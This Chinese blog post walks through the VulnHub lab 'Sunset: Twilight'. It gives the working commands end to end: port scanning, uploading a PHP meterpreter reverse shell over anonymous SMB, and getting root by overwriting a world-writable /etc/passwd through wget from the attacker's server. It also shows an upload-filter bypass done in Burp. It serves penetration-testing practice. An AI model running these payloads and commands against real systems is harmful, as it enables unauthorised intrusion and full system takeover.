PJzhang:vulnhub靶機sunset系列SUNSET:TWILIGHT

貓寧~~~

地址：https://www.vulnhub.com/entry/sunset-twilight,512/

關注工具和思路。

nmap 192.168.43.0/24
靶機IP
192.168.43.164

nmap -A -p1-65535 192.168.43.164

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later

enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.

smbclient //192.168.43.164/WRKSHARE，無密碼登錄
smb: \>
cd \var\www\html
smb: \var\www\html\>

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

smb下上傳muma.php
smb: \var\www\html\> put muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

訪問http://192.168.43.164/muma.php，反彈shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$

cd /home
顯示存在miguel的用戶
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

ls -al /etc/passwd，有讀寫權限
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

攻擊機執行
openssl passwd -1 -salt useruser 123456

將靶機/etc/passwd複製到本地
最後一行添加
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

python3 -m http.server 80

wget http://192.168.43.154/passwd -O /etc/passwd

su useruser
id
uid=0(root) gid=0(root) groups=0(root)

利用上傳接口獲取shell

dirb http://192.168.43.3/

http://192.168.43.3/gallery/

http://192.168.43.3/gallery/original/，可以查看文件目錄，例如上傳的muma.php

重命名muma.php爲muma.php.pjpeg

上傳，burpsuite抓包，
Content-Type: image/jpeg
文件名重新修改爲muma.php

上傳成功

http://192.168.43.3/gallery/original/muma.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

成功獲取shell

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

PJzhang:vulnhub靶機sunset系列SUNSET:TWILIGHT

PJzhang:冰蠍webshell管理工具試用

PJzhang:哥斯拉webshell管理工具試用

PJzhang:metasploit執行android手機木馬

PJzhang:蟻劍webshell管理工具試用

PJzhang:Firefox滲透測試插件HackTools樣例

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結